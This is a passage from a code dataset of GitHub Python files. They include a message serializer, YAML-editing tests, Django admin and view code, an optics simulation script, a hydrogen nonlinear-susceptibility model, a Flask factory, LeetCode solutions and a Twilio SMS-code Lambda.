InteractionType.REQUEST:\n return b\"\"\n encoded_messages = []\n for message, author in self.messages:\n author = author.encode()\n encoded_messages.append(\n struct.pack(\n f\"!II{len(author)}s{len(message)}s\",\n len(author),\n len(message),\n author,\n message,\n )\n )\n\n return struct.pack(\"!I\", len(self.messages)) + b\"\".join(encoded_messages)\n\n @classmethod\n def from_bytes(\n cls, interaction_type: InteractionType, data_bytes: bytes\n ) -> \"GetMessagesCommand\":\n if interaction_type == InteractionType.REQUEST:\n return cls(interaction_type=InteractionType.REQUEST)\n current_position = 0\n messages_number = struct.unpack(\n \"!I\", data_bytes[current_position : current_position + 4]\n )[0]\n current_position += 4\n messages = []\n for i in range(messages_number):\n author_length, message_length = struct.unpack(\n \"!II\", data_bytes[current_position : current_position + 8]\n )\n current_position += 8\n author, message = struct.unpack(\n f\"!{author_length}s{message_length}s\",\n data_bytes[\n current_position : current_position + author_length + message_length\n ],\n )\n current_position += author_length + message_length\n messages.append((message, author.decode()))\n return cls(interaction_type=InteractionType.RESPONSE, messages=messages)\n","repo_name":"ArtemTolstoguzov/ds","sub_path":"message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":9560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36237569036","text":"from textwrap import dedent\n\nimport yaml\n\nfrom peru import edit_yaml\nimport shared\n\nyaml_template = dedent(\"\"\"\\\n a:\n b: [1, 2, 3]\n c: {}\n d: blarg\n \"\"\")\n\n\nclass EditYamlTest(shared.PeruTest):\n def test_replace(self):\n start_yaml = yaml_template.format(\"foo\")\n new_yaml = edit_yaml.set_module_field(start_yaml, \"a\", \"c\", \"bar\")\n self.assertEqual(yaml_template.format(\"bar\"), new_yaml)\n\n def test_insert(self):\n start_yaml = dedent(\"\"\"\\\n a:\n b: foo\n \"\"\")\n new_yaml = edit_yaml.set_module_field(start_yaml, \"a\", \"c\", \"bar\")\n self.assertEqual(start_yaml + \" c: bar\\n\", new_yaml)\n\n def test_insert_number_looking_fields(self):\n # These all need to be quoted, or else YAML will interpret them as\n # literal ints and floats.\n start_yaml = dedent('''\\\n a:\n b: foo\n ''')\n intermediate = edit_yaml.set_module_field(start_yaml, 'a', 'c', '5')\n new_yaml = edit_yaml.set_module_field(intermediate, 'a', 'd', '.0')\n expected_yaml = start_yaml + ' c: \"5\"\\n d: \".0\"\\n'\n self.assertEqual(expected_yaml, new_yaml)\n self.assertDictEqual(\n yaml.safe_load(new_yaml),\n {'a': {\n 'b': 'foo',\n 'c': '5',\n 'd': '.0',\n }})\n\n def test_insert_with_last_field_as_dict(self):\n start_yaml = dedent(\"\"\"\\\n a:\n b:\n foo: bar\n baz: bing\n x: y\n \"\"\")\n end_yaml = dedent(\"\"\"\\\n a:\n b:\n foo: bar\n baz: bing\n c: stuff\n x: y\n \"\"\")\n edited_yaml = edit_yaml.set_module_field(start_yaml, \"a\", \"c\", \"stuff\")\n self.assertEqual(end_yaml, edited_yaml)\n\n def test_with_file(self):\n tmp_name = shared.tmp_file()\n start_yaml = yaml_template.format(\"foo\")\n with open(tmp_name, \"w\") as f:\n f.write(start_yaml)\n edit_yaml.set_module_field_in_file(tmp_name, \"a\", \"c\", \"bar\")\n with open(tmp_name) as f:\n new_yaml = f.read()\n self.assertEqual(yaml_template.format(\"bar\"), new_yaml)\n","repo_name":"buildinspace/peru","sub_path":"tests/test_edit_yaml.py","file_name":"test_edit_yaml.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"35"} +{"seq_id":"33244002615","text":"from django.contrib import admin\n\nfrom texts.models import LenguaText, OriginalText, Suggestion, SmartText\n\n\n@admin.register(LenguaText)\nclass LenguaTextManagement(admin.ModelAdmin):\n list_display = ('uuid', 'values')\n search_fields = ('uuid', 'values')\n\n\n@admin.register(SmartText)\nclass SmartTextManagement(admin.ModelAdmin):\n readonly_fields = ('language', 'text_origin', 'count')\n list_display = ('count', 'text', 'language')\n search_fields = ('count', 'text', 'language')\n\n\n@admin.register(OriginalText)\nclass OriginalTextManagement(admin.ModelAdmin):\n readonly_fields = ('original', 'text', 'count')\n list_display = ('count', 'original')\n search_fields = ('count', 'original')\n\n\n@admin.register(Suggestion)\nclass SuggestionManagement(admin.ModelAdmin):\n readonly_fields = ('original', 'translation', 'count')\n list_display = ('original', 'translation', 'user_translation', 'from_language', 'to_language', 'count')\n list_filter = ('original', 'translation', 'user_translation', 'from_language', 'to_language', 'count')\n search_fields = ('original', 'translation', 'user_translation')\n","repo_name":"Yonimdo/yify-translator","sub_path":"texts/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6981290432","text":"import numpy as np\nimport jcmwave,time,imp,shutil,os \nfrom optparse import OptionParser\nAOI = [20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45]\n\nlams = [214,215,217,218,219,220,221,222]\n#azimuths = [0,2,4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38,40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74,76,78,80,82,84,86,88,90,92,94,96,98,100,102,104,106,108,110,112,114,116,118,120,122,124,126,128,130,132,134,136,138,140,142,144,146,148,150,152,154,156,158,160,162,164,166,168,170,172,174,176,178,180,182,184,186,188,190,192,194,196,198,200,202,204,206,208,210,212,214,216,218,220,222,224,226,228,230,232,234,236,238,240,242,244,246,248,250,252,254,256,258,260,262,264,266,268,270,272,274,276,278,280,282,284,286,288,290,292,294,296,298,300,302,304,306,308,310,312,314,316,318,320,322,324,326,328,330,332,334,336,338,340,342,344,346,348,350,352,354,356,358,360]\nkeys = {} # Create empty dictionary for keys\nfor lam in lams:\n for ang in AOI:\n parser = OptionParser()\n parser.add_option(\"-t\", \"--threads\",\n action=\"store\",type=\"int\", dest=\"threads\",\n help=\"number of threads to use\")\n (options, args) = parser.parse_args()\n\n jcmwave.set_num_threads(options.threads)\n \n keys = {} # Create empty dictionary for keys\n results = [] # Create empty array for results\n tic = time.time() # use time() not clock() on linux system \n # Set simulation parameters\n \n keys = {\n 'AOI': ang,\n 'radius': 50,\n 'vacuum_wavelength': lam*1e-9,\n 'uol': 1e-9,\n 'display_triangulation' : 'no',\n 'boundary' : 'Periodic',\n 'info_level' : -1,\n 'fem_degree' : 2,\n 'n_refinement_steps' : 0, # Currently we get non-physical results if this is >0\n 'thickness' : 50,\n 'pitch' : 175, # pitch of square lattice (gammadion)\n 'z_radius' : 5, # radius of curvature of dimer in z plane\n 'z_radius_MSL' : 1 # maximum side length of z radius\n }\n\n\n tag_ = 'other_rotations_MM_NSL_hexagonal_lattice_radius_' + str(keys['radius']) + '_nm_structure_thickness_' + str(keys['thickness']) + '_nm_pitch_' + str(keys['pitch']) + '_wavelength_' + str(keys['vacuum_wavelength']) +'nm_' + str(keys['AOI']) +'AOI'\n\n\n\n # material properties\n keys['n_3'] = 1.00 # index refraction of Air\n\n \n Au_nk = np.loadtxt('../data/Al_OMEL_mfp.nk') #Al not GOLD!!!!!!!!!!!!!!!!!!!!!!!\n wl_Au_data = []; n_Au_real = []; n_Au_imag = []\n for data in Au_nk:\n wl_Au_data.append(data[0]*1e-9) # e-10 for [ang], e-9 for [nm], e-6 for [um]\n n_Au_real.append(data[1])\n n_Au_imag.append(data[2])\n\n \n # material properties\n keys['n_3'] = 1.00 # index refraction of Air\n\n \n azimuths = np.linspace(30, 90, 31)\n for keys['azimuth'] in azimuths:\n #print('Wavelength : %3.2f nm' % (keys['vacuum_wavelength']*1e9))\n keys['n_2'] = np.interp(keys['vacuum_wavelength'], wl_Au_data, n_Au_real) + 1j*np.interp(keys['vacuum_wavelength'], wl_Au_data, n_Au_imag)\n keys['sm_filename'] = '\"'+'project_results/sm.jcm\"'\n jcmwave.jcmt2jcm('./boundary_conditions.jcmt', keys)\n jcmwave.jcmt2jcm('./materials.jcmt', keys)\n jcmwave.jcmt2jcm('./project.jcmpt', keys)\n jcmwave.jcmt2jcm('./sources.jcmt', keys)\n jcmwave.jcmt2jcm('./layout.jcmt', keys)\n jcmwave.solve('./project.jcmp')\n \n ## Gather Reflected Fourier Modes (Z)\n filename_fourierModes_r = './project_results/fourier_modes_r.jcm';\n fourierModes_r = jcmwave.loadtable(filename_fourierModes_r,format='named')\n powerFlux_r = jcmwave.convert2powerflux(fourierModes_r)\n\n ## Reflected flux in normal direction\n P_s_t = np.sum(powerFlux_r['PowerFluxDensity'][0][:, 2]);\n P_p_t = np.sum(powerFlux_r['PowerFluxDensity'][1][:, 2]); \n\n \n filename_MM = './project_results/sm.jcm'\n\n print(filename_MM)\n table = jcmwave.loadtable(filename_MM)\n m11 = table['Mueller_xy11'][0]\n m12 = table['Mueller_xy12'][0]\n m13 = table['Mueller_xy13'][0]\n m14 = table['Mueller_xy14'][0]\n m21 = table['Mueller_xy21'][0]\n m22 = table['Mueller_xy22'][0]\n m23 = table['Mueller_xy23'][0]\n m24 = table['Mueller_xy24'][0]\n m31 = table['Mueller_xy31'][0]\n m32 = table['Mueller_xy32'][0]\n m33 = table['Mueller_xy33'][0]\n m34 = table['Mueller_xy34'][0]\n m41 = table['Mueller_xy41'][0]\n m42 = table['Mueller_xy42'][0]\n m43 = table['Mueller_xy43'][0]\n m44 = table['Mueller_xy44'][0]\n\n \n \n\n # save data to file\n results.append([keys['vacuum_wavelength'], keys['pitch'], keys['AOI'], keys['azimuth'], P_s_t, P_p_t,m11, m12, m13, m14, m21, m22, m23, m24, m31, m32, m33, m34, m41, m42, m43, m44])\n np.savetxt('./my_results' + tag_ + '.txt', results, header='wvl[m], pitch, AOI, Azimuth, Transm_Pol-1, Transm_Pol-2, m11, m12, m13, m14, m21, m22, m23, m24, m31, m32, m33, m34, m41, m42, m43, m44')\n \n toc = time.time() # use time() not clock() on linux system \n t = toc-tic\n print (\"Total runtime for \"+tag_+\": %6.4f s\" % t)\n \n","repo_name":"ColtonDaCoder/Chiral_Nanoparticles","sub_path":"run_simulation.py","file_name":"run_simulation.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23679785682","text":"import torch.nn as nn\n\n\n# borrowed from https://github.com/amdegroot/ssd.pytorch/blob/master/ssd.py\ndef vgg(cfg, batch_norm=False):\n layers = []\n in_channels = 3\n for v in cfg:\n if v == 'M':\n layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n elif v == 'C':\n layers += [nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)]\n else:\n conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)\n if batch_norm:\n layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]\n else:\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = v\n pool5 = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)\n conv6 = nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6)\n conv7 = nn.Conv2d(1024, 1024, kernel_size=1)\n layers += [pool5, conv6,\n nn.ReLU(inplace=True), conv7, nn.ReLU(inplace=True)]\n return layers","repo_name":"quic/aimet-model-zoo","sub_path":"aimet_zoo_torch/ssd_mobilenetv2/model/vision/nn/vgg.py","file_name":"vgg.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":237,"dataset":"github-code","pt":"37"} +{"seq_id":"18635739777","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 5 22:21:16 2018\n\n@author: Main\nmodel of third order susptability in hydrogen\n\"\"\"\nfrom time import strftime\nimport itertools\nimport pickle\nimport numpy as np\nimport sympy as sp\nfrom sympy import init_printing\nfrom sympy.functions import conjugate\nfrom sympy.physics.hydrogen import R_nl\nfrom sympy.physics.hydrogen import E_nl\nfrom sympy.functions.special.spherical_harmonics import Ynm\nimport scipy.constants as constants\ninit_printing()\n\ndef hydrogen_omega_matrix(basis):\n \"\"\"\n Uses sympy to calculate and return the matrix representation of the omega matrix, the matrix of\n einstien frequencies in atomic units hbar = m_e = e = 1\n \n Parameters\n ----------\n basis: iterable of tuples\n each tuple defines a state of hydrogen to use in calculating the matrix. The number of tuples\n is the number of rows and columns in the returned matrices. Each tuple has 3 entries (n, l, m)\n where n is the principle quantum number, l is the total angular momentum quantum number, and\n m is the magnetic quantum number.\n \n Returns\n -------\n sp.Matrix\n This is the omega matrix for hydrogen given the basis set used\n \"\"\"\n E_basis = [E_nl(n) for n, l, m in basis]\n return sp.Matrix([[E_f - E_i for E_f in E_basis] for E_i in E_basis])\n\ndef hydrogen_dipole_matrix(basis):\n \"\"\"\n Uses sympy to calculate an return the matrix representation of the dipole vector operator in the\n hydrogen basis set in atomic units for x, y, z coordinates.\n \n Parameters\n ----------\n basis: iterable of tuples\n each tuple defines a state of hydrogen to use in calculating the matrix. The number of tuples\n is the number of rows and columns in the returned matrices. Each tuple has 3 entries (n, l, m)\n where n is the principle quantum number, l is the total angular momentum quantum number, and\n m is the magnetic quantum number.\n \n Returns\n -------\n list of matrices\n Returns 3 sp.Matrix objects representing the dipole vector operator in the x, y, and z\n cartesian coordinates respectively \n \"\"\"\n # define vars\n r, theta, phi = sp.symbols(\"r, theta, phi\", real=True)\n \n # define transformations to cartiesian and the dipole operators\n z = r*sp.cos(theta)\n x = r*sp.sin(theta)*sp.cos(phi)\n y = r*sp.sin(theta)*sp.sin(phi)\n \n # define basis in atomic units\n print(\"making basis wavefunctions\")\n H_nlm = [(R_nl(n, l, r)*sp.simplify(Ynm(l, m, theta, phi).expand(func=True)), (n, l, m))\n for n, l, m in basis]\n \n # find dipole transition matrix elements: H_init = inital hydrogen orbital, H_final = final hydrogen orbital \n mu = []\n element = lambda H_final, op, H_init: sp.integrate(H_final*op*H_init*sp.sin(theta)*r**2, (r, 0, sp.oo), (theta, 0, sp.pi), (phi, 0, 2*sp.pi))\n select_rules = lambda basis_f, basis_i: True#all([abs(basis_f[1] - basis_i[1]) == 1, abs(basis_f[2] - basis_i[2]) >= 1])\n print(\"Computing matrix elements\")\n for mu_oper in [x, y, z]:\n mu.append(sp.Matrix([[element(conjugate(bra), mu_oper, ket) \n if select_rules(basis_f, basis_i) else 0\n for bra, basis_f in H_nlm] \n for ket, basis_i in H_nlm]))\n return mu\n\ndef decay_rate_estimates(omega, dipole_vector, alpha=1/137.035999139, c=137.035999139, n=1):\n \"\"\"\n Estimates the decay rate matrix (gamma matrix) using expressions for spontaneous emission rates\n given the omega matrix, and dipole_vector matrix. Assumes hartree atomic units.\n \n Parameters\n ----------\n omega: sympy Matrix\n the matrix of einstien frequencies for a given transition between two states\n dipole_vector: tuple of three sympy Matrices\n the matrix representation of the dipole vector operator being used\n alpha: float\n The fine structure constant\n c: float\n The speed of light\n n: float\n The index of refraction\n \n Returns\n -------\n sympy Matrix\n The decay rate matrix (gamma matrix) using the rate of spontaneous emission as the estimator\n \"\"\"\n dipole = lambda m, n: sum([abs(dipole_vector[xyz][m, n])**2 for xyz in range(3)])\n \n return sp.Matrix([[(4*alpha*n*dipole(j, i)*omega[j, i]**3)/(3*c**2)\n for i in range(omega.shape[1])] # col index\n for j in range(omega.shape[0])]) # row index\n\ndef chi_3(k, i, j, h, omw_r, omw_q, omw_p, dipole, relax_gamma, density_matrix, omega_matrix):\n \"\"\"\n Computes elements of the 2nd hyperpolarizability using Boyd's quantum discription of chi3\n (Nonlinear Optics 3rd ed pg 182).\n \"\"\"\n numb_of_states = density_matrix.shape[0]\n cartiesian_indices = [i, j, h]\n lights_omegas = [omw_r, omw_q, omw_p]\n chi3_kijk = 0\n \n def chi_3_no_permuations(xyz, omegas, numb_states):\n chi3_temp = 0\n for n in range(numb_states):\n for m in range(numb_states):\n for v in range(numb_states):\n for l in range(numb_states):\n a = (density_matrix[m, m] - density_matrix[l, l]) \\\n *(dipole[k][m, n]*dipole[xyz[1]][n, v]*dipole[xyz[0]][v, l]*dipole[xyz[2]][l, m]) \\\n /((omega_matrix[n, m] - omegas[2] - omegas[1] - omegas[0] - sp.I*relax_gamma[n, m]) \\\n *(omega_matrix[v, m] - omegas[2] - omegas[1] - sp.I*relax_gamma[v, m]) \\\n *(omega_matrix[l, m] - omegas[2] - sp.I*relax_gamma[l, m]))\n \n b = (density_matrix[l, l] - density_matrix[v, v]) \\\n *(dipole[k][m, n]*dipole[xyz[1]][n, v]*dipole[xyz[0]][l, m]*dipole[xyz[2]][v, l]) \\\n /((omega_matrix[n, m] - omegas[2] - omegas[1] - omegas[0] - sp.I*relax_gamma[n, m]) \\\n *(omega_matrix[v, m] - omegas[2] - omegas[1] - sp.I*relax_gamma[v, m]) \\\n *(omega_matrix[v, l] - omegas[2] - sp.I*relax_gamma[v, l]))\n \n c = (density_matrix[v, v] - density_matrix[l, l]) \\\n *(dipole[k][m, n]*dipole[xyz[1]][v, m]*dipole[xyz[0]][n, l]*dipole[xyz[2]][l, v]) \\\n /((omega_matrix[n, m] - omegas[2] - omegas[1] - omegas[0] - sp.I*relax_gamma[n, m]) \\\n *(omega_matrix[n, v] - omegas[2] - omegas[1] - sp.I*relax_gamma[n, v]) \\\n *(omega_matrix[l, v] - omegas[2] - sp.I*relax_gamma[l, v]))\n \n d = (density_matrix[l, l] - density_matrix[n, n]) \\\n *(dipole[k][m, n]*dipole[xyz[1]][v, m]*dipole[xyz[0]][l, v]*dipole[xyz[2]][n, l]) \\\n /((omega_matrix[n, m] - omegas[2] - omegas[1] - omegas[0] - sp.I*relax_gamma[n, m]) \\\n *(omega_matrix[n, v] - omegas[2] - omegas[1] - sp.I*relax_gamma[n, v]) \\\n *(omega_matrix[n, l] - omegas[2] - sp.I*relax_gamma[n, l]))\n chi3_temp += a - b - c + d\n return sp.simplify(chi3_temp)\n \n simultaneous_permutations = list(itertools.permutations(zip(cartiesian_indices, lights_omegas)))\n numb_aves = len(simultaneous_permutations)\n for current_xyzs_omegas in simultaneous_permutations:\n current_xyzs = [xyz_omega[0] for xyz_omega in current_xyzs_omegas]\n current_omegas = [xyz_omega[1] for xyz_omega in current_xyzs_omegas]\n chi3_kijk += chi_3_no_permuations(current_xyzs, current_omegas, numb_of_states)/numb_aves\n return sp.simplify(chi3_kijk)\n\ndef hydrogen_basis(max_n):\n \"\"\"\n n\n l = [0,n-1]\n m = [-l, l]\n \"\"\"\n basis = []\n for n in range(1, max_n + 1):\n for l in range(0, n):\n for m in range(-l, l + 1):\n basis.append((n, l, m))\n return basis\n\ndef pickle_matrices(object_to_pickle, file_path):\n \"\"\"\n Uses the Pickle module to save computationally expensive matrices to a given\n file path\n \"\"\"\n with open(file_path, 'wb') as f:\n pickle.dump(object_to_pickle, f)\n \ndef unpickle_matrices(file_path):\n \"\"\"\n Uses the Pickle module to save computationally expensive matrices to a given\n file path\n \"\"\"\n with open(file_path, 'rb') as f:\n dipole, omega, decay = pickle.load(f)\n return dipole, omega, decay\n\ndef perturb_density(rho_init, mu, omega, decay, efield_pump, time_var, t_finals, hbar = 1):\n \"\"\"\n Uses the density matrix formulation of first order perturbation theory with\n damping to calculate the density matrix after some time (t) in atomic units\n (boyd 2nd ed eq 3.5.1 pg 161 [pg 173 pdf])\n \n Parameters\n ----------\n rho_init: n by n sympy matrix \n mu: list of three n by n sympy matrices\n omega: n by n sympy matrix \n decay: n by n sympy matrix \n efield_pump: list of three sympy functions\n time: float\n hbar: 1 in atomic units\n \n Notes\n -----\n integration starts at t = 0\n \"\"\"\n size_row, size_col = rho_init.shape\n rho_final = sp.zeros(size_row, size_col)\n V = sp.zeros(size_row, size_col)\n t_prime = sp.symbols(\"t_prime\")\n t = time_var\n #print(\"E_field = {0}\\nDipole = {1}\".format(efield_pump, mu))\n for element in [efield_pump[axis]*mu[axis] for axis in range(len(mu))]:\n V += element\n print(\"Dipole Potential = {}\".format(V))\n commute = ((V*rho_init - rho_init*V)*(-sp.I/hbar)).subs({t: t_prime})\n print(\"[V, rho_init] = {}\".format(commute))\n \n final_rhos = []\n for t_final in t_finals:\n for r in range(size_row): \n for c in range(size_col):\n exp_factor_integral = sp.exp((sp.I*omega[r, c] + decay[r, c])*t_prime)\n exp_factor = sp.exp((-sp.I*omega[r, c] + decay[r, c])*t)\n integrand = commute[r, c]*exp_factor_integral\n try:\n integral = sp.integrate(integrand, (t_prime, 0, t_final), risch=False)\n except Exception as e:\n print(\"integrand = {}\".format(integrand))\n print(\"row = {0}, col = {1}\".format(r, c))\n raise(e)\n rho_final[r, c] = integral*exp_factor.subs({t: t_final}) + rho_init[r, c]\n final_rhos.append(rho_final)\n print(\"computed perturbed rho for t_final = {}\".format(t_final))\n print(\"perturbed rho\\n-------------\\n{}\".format(rho_final))\n \n return final_rhos\n \n\ndef main():\n \"\"\"\n for calculating estimates for the relaxation matrix consider using these eqs\n https://en.wikipedia.org/wiki/Spontaneous_emission#Rate_of_spontaneous_emission\n \"\"\"\n chi3_conversion_factor = constants.physical_constants[\"atomic unit of 2nd hyperpolarizability\"][0]\n basis = hydrogen_basis(2)\n pickled_output_file = \"pickled_dipole_freq_decay_with_{}_basis_functions_{}.pickle\".format(len(basis), strftime(\"%H-%M-%S\"))\n \n omw = (E_nl(2) - E_nl(1))/8 # driving and probing light freq\n density_0 = sp.zeros(len(basis), len(basis))\n density_0[0, 0] = 1\n \n #make pump field\n #see https://en.wikipedia.org/wiki/Gaussian_function\n # I = 0.5*c*n*epsilon_0*|E|**2\n # |E| = sqrt(2*I/c*n*epsilon_0)\n time = sp.symbols(\"time\")\n time_conversion = constants.physical_constants['atomic unit of time'][0]/constants.femto\n efield_conversion = constants.physical_constants[\"atomic unit of electric field\"][0]\n t_0 = 200/time_conversion #fs\n FWHM_durration = 100/time_conversion #fs\n intensity = 2*10**20 #W/cm**2\n n = 1\n E_mag = np.sqrt(2*(intensity*10**4)/(constants.c*n*constants.epsilon_0))/efield_conversion\n E_x = 0\n E_y = 0\n E_z = E_mag*sp.exp((-4*np.log(2)*(time - t_0)**2)/(FWHM_durration**2))\n E_field = [E_x, E_y, E_z]\n \n print(\"hydrogen basis set = {}\".format(basis))\n print(\"Initial density matrix\")\n sp.pprint(density_0)\n print(\"computing hydrogen\\'s dipole matrix\")\n mu = hydrogen_dipole_matrix(basis)\n print(\"computing hydrogen\\'s frequency matrix\")\n omega = hydrogen_omega_matrix(basis)\n print(\"estimating hydrogen\\'s decay rate matrix\")\n gamma = decay_rate_estimates(omega, mu)\n \n save_data_dict = {\"mu\": mu, \"omega\": omega,\"decay\": gamma}\n \n time_steps = np.linspace(0, 1000, 6) #fs\n print(\"time steps = {} fs\".format(time_steps))\n \n save_data_dict[\"time_steps_fs\"] = time_steps\n \n perturbed_rhos = perturb_density(density_0, mu, omega, gamma, E_field, time, time_steps/time_conversion)\n save_data_dict[\"perturbed_rhos\"] = perturbed_rhos\n print(\"perturbed_rhos = {}\".format(perturbed_rhos))\n\n print(\"computing chi3_yxxy and chi3_yxyx\")\n chi3_yxxy = np.array([chi_3(1, 0, 0, 1, omw, omw, omw, mu, gamma, rho, omega) for rho in perturbed_rhos])\n save_data_dict[\"chi3_yxxy_au\"] = chi3_yxxy\n print(\"chi3_yxxy = {} a.u.\".format(chi3_yxxy))\n chi3_yxyx = np.array([chi_3(1, 0, 1, 0, omw, omw, omw, mu, gamma, density_0, omega) for rho in perturbed_rhos])\n save_data_dict[\"chi3_yxyx_au\"] = chi3_yxyx\n print(\"chi3_yxyx = {} a.u.\".format(chi3_yxyx))\n chi3_eff = chi3_yxxy + chi3_yxyx\n save_data_dict[\"chi3_eff_SI\"] = chi3_eff*chi3_conversion_factor\n print(\"chi3_eff = {} m^2/V^2\".format(chi3_eff*chi3_conversion_factor))\n print(\"|chi3_eff|^2 = {} SI\".format(abs(chi3_eff*chi3_conversion_factor)**2))\n \n pickle_matrices(save_data_dict, pickled_output_file)\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zifn/Hydrogen","sub_path":"hydrogen.py","file_name":"hydrogen.py","file_ext":"py","file_size_in_byte":13590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22936038400","text":"import os\n\nfrom flask import Flask\nimport flaskr.Server\n\"\"\"\n 存在问题!\n config.py\n\"\"\"\ndef create_app(test_config=None):\n app=Flask(__name__,instance_relative_config=True)\n # __name__为当前模块的名称\n app.config.from_mapping(SECRET_KEY='dev',DATABASE=os.path.join(app.instance_path,'flaskr.db'),)\n # app.config.from_mapping()设置一个应用的缺省配置\n if test_config is None:\n app.config.from_pyfile('config.py',slient=True)\n else:\n app.config.from_mapping(test_config)\n\n\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n from . import auth\n app.register_blueprint(auth.bp)\n\n @app.route('/')\n def hello():\n return \"Hello,MY name is BuBu!\"\n return app\n\n\nif __name__ == '__main__':\n Server()\n","repo_name":"LiuGuangbu/Pairr","sub_path":"PairrService/flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25201518680","text":"'''\nn = 1 0, 1\nn =2 -> 00 01 11 10\nn = 3 -> 110 111 101 100\nn = 4 -> \n'''\nclass Solution:\n def grayCode(self, n: int) -> List[int]:\n output = [0,1]\n for _ in range(1,n):\n b = len(output)\n c = 2**_\n for __ in reversed(range(b)):\n output.append(c + output[__])\n return output\n \n \n ","repo_name":"Atul-Verma-Git/100-days-of-code","sub_path":"gray-code/gray-code.py","file_name":"gray-code.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34640561966","text":"# https://leetcode.com/problems/can-place-flowers/\n# 先用普通的思路,判断每个0是否合法,然后将对应的位置改成1,然后n减一,把n减为0之后就返回True\n# 但是会有很多边界条件导致我们代码很臃肿\nfrom typing import List\n\nclass Solution:\n def canPlaceFlowers(self, flowerbed: List[int], n: int) -> bool:\n tmp = [0] + flowerbed + [0]\n index = 1\n while index < len(tmp) - 1:\n if tmp[index-1] == 0 and tmp[index] == 0 and tmp[index+1] == 0:\n n -= 1\n if n <= 0:\n return True\n index += 1\n index += 1\n return n <= 0\n \n","repo_name":"ZhangYet/vanguard","sub_path":"myrtle/date0310/can_place_flower.py","file_name":"can_place_flower.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74604662508","text":"import logging\nimport random\n\nfrom twilio.rest import Client\n\nfrom common.CommonResultCode import CommonResultCode\nfrom common.Json import Json\nfrom common.MonterException import MonterException\nfrom common.const import ConstTwilio\nfrom common.response_handler import ResponseHandler\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('api')\n\nclient = Client(ConstTwilio.ACCOUNT_SID, ConstTwilio.AUTH_TOKEN)\n\n\n@ResponseHandler.api\ndef lambda_handler(event, context):\n phone_no = get_body_contents(event)\n\n code = make_random_4_digits()\n message = ConstTwilio.MESSAGE_FORMAT.format(code=code)\n\n phone_no = f\"+82{phone_no}\"\n twilio_response = send_trailio_sms(phone_no, message)\n\n if twilio_response.get('statusCode', 400) != 200:\n raise MonterException(CommonResultCode.TWILIO_SEND_SMS_ERROR, None, twilio_response['errorMessage'])\n\n return { 'code': code }\n\n\ndef get_body_contents(event) -> str:\n body_dict = Json.to_dict(event['body'])\n\n if 'phoneNo' not in body_dict:\n raise MonterException(CommonResultCode.INVALID_BODY_CONTENTS, None, '휴대폰 번호가 없습니다')\n\n return body_dict['phoneNo']\n\n\ndef make_random_4_digits() -> int:\n return random.randint(1000, 10000)\n\n\ndef send_trailio_sms(to, contents):\n message = client.messages.create(\n from_=ConstTwilio.FROM,\n body=contents,\n to=to\n )\n\n status_code = 200 if message.error_code is None else message.error_code\n return {\n 'statusCode': status_code,\n 'errorMessage': message.error_message,\n 'message.sid': message.sid\n }\n","repo_name":"0woodev/monter.api","sub_path":"d_auth/v1_auth_sms_code_post/v1_auth_sms_code_post.py","file_name":"v1_auth_sms_code_post.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74132867627","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Service, UserRentService, ReturnRequest\nfrom .forms import RentServiceForm, SaleServiceForm, RentForm\nfrom django.views.decorators.csrf import csrf_exempt\nimport datetime\nfrom datetime import date\nfrom django.contrib.auth.decorators import login_required\n\nfrom .forms import ServiceSearchForm\n\n@login_required\ndef services_list(request):\n form = ServiceSearchForm(request.GET)\n services = Service.objects.all()\n\n if form.is_valid():\n if form.cleaned_data['search_category']:\n services = services.filter(category=form.cleaned_data['search_category'])\n\n return render(request, 'servicesApp/services_list.html', {'services': services, 'form': form})\n\n@login_required\ndef service_detail(request, pk):\n service = Service.objects.get(pk=pk)\n template_name = 'servicesApp/rent_detail.html' if service.type == Service.RENT else 'servicesApp/sale_detail.html'\n return render(request, template_name, {'service': service})\n\n@login_required\ndef create_rent_service(request):\n form = RentServiceForm(request.POST or None)\n if form.is_valid():\n service = form.save(commit=False)\n service.type = Service.RENT\n service.save()\n return redirect('servicesApp:service_detail', pk=service.pk)\n return render(request, 'servicesApp/create_service.html', {'form': form})\n\n@login_required\ndef create_sale_service(request):\n form = SaleServiceForm(request.POST or None)\n if form.is_valid():\n service = form.save(commit=False)\n service.type = Service.SALE\n service.save()\n return redirect('servicesApp:service_detail', pk=service.pk)\n return render(request, 'servicesApp/create_service.html', 